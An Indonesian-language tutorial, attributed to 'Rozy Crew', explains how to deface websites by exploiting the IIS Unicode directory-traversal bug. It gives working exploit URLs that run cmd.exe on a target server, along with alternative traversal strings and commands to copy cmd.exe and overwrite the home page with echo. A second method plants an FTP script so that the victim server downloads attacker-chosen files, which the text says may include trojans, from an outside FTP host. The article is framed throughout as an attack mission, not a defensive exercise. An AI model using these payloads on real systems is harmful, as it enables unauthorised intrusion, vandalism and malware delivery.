Artikel From Rozy Crew

1. Internet browser, misalnya Microsoft Internet Explorer, Netscape Navigator atau Opera

2. Pengetahuan mengenai perintah-perintah dalam sistem operasi Windows NT. Ini dikarenakan sampai artikel ini ditulis IIS hanya jalan di Windows NT.

3. Imajinasi Anda, imajinasi Anda sangat mempengaruhi hasil pekerjaan Anda. Kemampuan yang tinggi dipadu dengan imajinasi yang kuat akan menghasilkan sesuatu yang mungkin tidak akan didapatkan oleh orang lain.

Mari kita mulai misi deface kita kali ini.

Pertama Anda harus menentukan target situs yang akan di deface. Penulis ambil contoh saja target situs yang menjadi sasaran adalah www.targethost.com. Situs target ini bisa mengandung beberapa kemungkinan dari segi webserver yang digunakan yaitu:

• Menggunakan web server yang bukan MS IIS dan berjalan di sistem operasi yang bukan Windows NT atau Windows 2000.

• Menggunakan web server yang bukan MS IIS tapi berjalan di sistem operasi Windows NT atau Windows 2000.

• Menggunakan IIS tapi sudah di-patch atau diperbaiki bug unicode nya.

• Menggunakan IIS dan belum di-patch bug unicode nya.

Dari semua kemungkinan diatas hanya kemungkinan yang terakhir yang bisa membuat misi kali ini sukses.

Karena sasaran kita adalah www.targethost.com maka sekarang coba ketik URL seperti di bawah ini pada internet browser Anda:

http://www.targethost.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:

1. Muncul pesan error di browser Anda. Ini terjadi karena kemungkinan-kemungkinan dari segi web server yang sudah penulis utarakan diatas.

2. Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka www.targethost.com tadi ada kemungkinan untuk bisa kita deface.

Mari kita perhatikan URL ajaib diatas. Penulis membagi URL diatas menjadi empat bagian yaitu:

1. Bagian host, yaitu "http://www.targethost.com"

2. Bagian eksploit string, yaitu "/scripts/..%c1%9c.."

3. Bagian folder, yaitu "/winnt/system32/"

4. Bagian command, yaitu "cmd.exe?/c+dir+c:\"

Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh file-file yang berada pada root drive C. Anda bisa mencoba perintah yang lain seperti "dir d:\" atau yang lain. Ingat, Anda harus mengganti karakter spasi dengan tanda "+". Anda bahkan bisa mengetahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada browser Anda. Untuk itu Anda bisa mengganti bagian eksploit string dengan beberapa pilihan berikut:

• /_vti_bin/..%c0%af../..%c0%af../..%c0%af..

• /msadc/..%c0%af../..%c0%af../..%c0%af..

• /scripts/..%c0%af..

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser Anda maka kemungkinan besar IIS pada web server sudah di-patch bug unicode nya. Dan Anda bisa memilih situs lain sebagai sasaran.

Mari kita lanjutkan kembali misi kita. Ternyata setelah Anda ketik URL diatas kemudian di browser Anda muncul daftar file pada root drive C web server sasaran Anda.

Langkah berikutnya adalah mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm, default.html, default.asp, index.asp, index.html atau index.htm. Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya Anda cukup mengetikkan URL seperti di bawah ini:

http://www.targethost.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Lihat pada bagian PATH_TRANSLATED. Pada bagian tersebut akan menunjukkan folder dari web root. Kita ambil contoh misalnya isi dari PATH_TRANSLATED adalah C:\InetPub\wwwroot.

Cara lain untuk mengetahui folder web root berada adalah dengan mengetikkan URL berikut:

• http://www.targethost.com/test.ida atau

• http://www.targethost.com/test.idq

Sekarang kita harus meng-copy-kan file cmd.exe pada direktori C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL berikut:

http://www.targethost.com/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\system32\cmdku.exe

Tujuan kita meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka perintah echo tidak bisa digunakan untuk menulis atau membuat file.

Sekarang Anda sudah bisa mendeface situs sasaran kita. Kali ini kita akan mendeface dengan menggunakan perintah internal echo. Deface model ini sangat sederhana dan cepat. Kita tidak perlu meng-upload file apapun ke web server sasaran. Perintah echo dapat digunakan untuk menulis pesan dan kemudian disimpan ke suatu file. Misalkan Anda akan deface situs sasaran dengan pesan "defaced by scriptkiddies", Anda bisa mengetikkan URL seperti di bawah ini:

http://www.targethost.com/scripts/..%c1%9c../winnt/system32/cmdku.exe?/c+echo+defaced+by+scriptkiddies+>c:\InetPub\wwwroot\default.htm

URL diatas akan menulis kata "defaced by scriptkiddies" pada file default.htm di folder c:\InetPub\wwwroot, sekarang coba Anda buka URL www.targethost.com. Jika web server menggunakan file default.htm sebagai file default situs tersebut maka hasil deface Anda akan segera terlihat. Jika tidak berhasil maka kemungkinan file default situs tersebut bukan default.htm.

Ada beberapa kemungkinan file default situs seperti index.html, index.htm, index.asp, default.htm, default.html, default.asp atau file lain yang sudah ditentukan oleh web admin.

Cara kedua untuk men-deface situs adalah dengan menggunakan ftp script. Dengan cara ini Anda bisa meng-upload file Anda ke komputer web server. Hal-hal yang diperlukan adalah:

1. FTP server, sebagai tempat menampung file yang hendak Anda transfer ke web server tujuan. Anda bisa memiliki ftp server dengan cara mendaftarkan diri ke penyedia situs gratis seperti www.virtualave.net atau www.freeservers.com

2. File-file yang hendak Anda transfer ke web server tujuan. File disini bisa berupa apa saja, mulai dari file html ataupun trojan.

3. Pengetahuan akan perintah-perintah ftp.

Berbeda dengan cara sebelumnya yang menggunakan perintah echo, kali ini kita akan memerintahkan web server tujuan untuk mendownload file yang ada pada ftp server Anda. Pada sistem operasi Windows terdapat suatu perintah yang dinamakan ftp.exe. Dengan perintah ini kita bisa memerintahkan komputer web server untuk mendownload file dari ftp server manapun di dunia ini. Bagaimana sih caranya? Ikuti saja langkah-langkah berikut ini:

1. Siapkan file yang akan Anda transfer ke web server tujuan. Misalkan Anda sudah membuat halaman deface Anda pada file default.htm.

2. Upload file default.htm Anda ke ftp server Anda. Misalkan alamat ftp server Anda adalah ftp.myftp.com dengan username ftpku dan password nya ftppass.

3. Sekarang Anda tinggal memerintahkan komputer web server untuk mendownload file tersebut. Anda harus membuat ftp script pada web server tujuan. FTP script adalah sekumpulan perintah-perintah untuk login ke ftp server dan mengadakan transaksi di ftp server. FTP script untuk kasus diatas adalah sebagai berikut:
   
        open ftp.myftp.com
        ftpku
        ftppass
        get default.htm c:\default.htm
        bye
   
   FTP script diatas kemudian Anda simpan ke suatu file, misalnya c:\ftpscript.txt

4. Bagaimanakah caranya menyimpannya? Caranya sangat mudah. Anda bisa menggunakan perintah echo untuk menulisnya. Contohnya adalah seperti berikut:
   
        echo open ftp.myftp.com >c:\ftpscript.txt
        echo ftpku >>c:\ftpscript.txt
        echo ftppass >>c:\ftpscript.txt
        echo get default.htm c:\default.htm >>c:\ftpscript.txt
        echo bye >>c:\ftpscript.txt

5. Kemudian Anda bisa menjalankan ftp script tadi dengan cara mengetikkan perintah "ftp.exe -s:c:\ftpscript.txt", atau kalau pada browser maka ketik seperti dibawah:
   
   http://www.targethost.com/scripts/..%c1%9c../winnt/system32/ftp.exe?-s:c:\ftpscript.txt

6. Web server tujuan akan login ke ftp server Anda dan kemudian mendownload file default.htm dan akan disimpan ke c:\default.htm

7. Setelah file tersebut ter-copy maka Anda bisa meng-copy file tersebut ke folder web root dan selanjutnya bisa Anda lihat melalui browser.

8. Misi selesai.

Selain menggunakan ftp script sebenarnya masih ada lagi cara lain seperti menggunakan teknik tftp atau trivia ftp. Tetapi penulis belum pernah mencoba cara ini. Jika ada diantara Anda yang sudah mencoba mungkin bisa berbagi pengalaman dengan cara menulis artikel kepada kita.

Sekian dan terimakasih.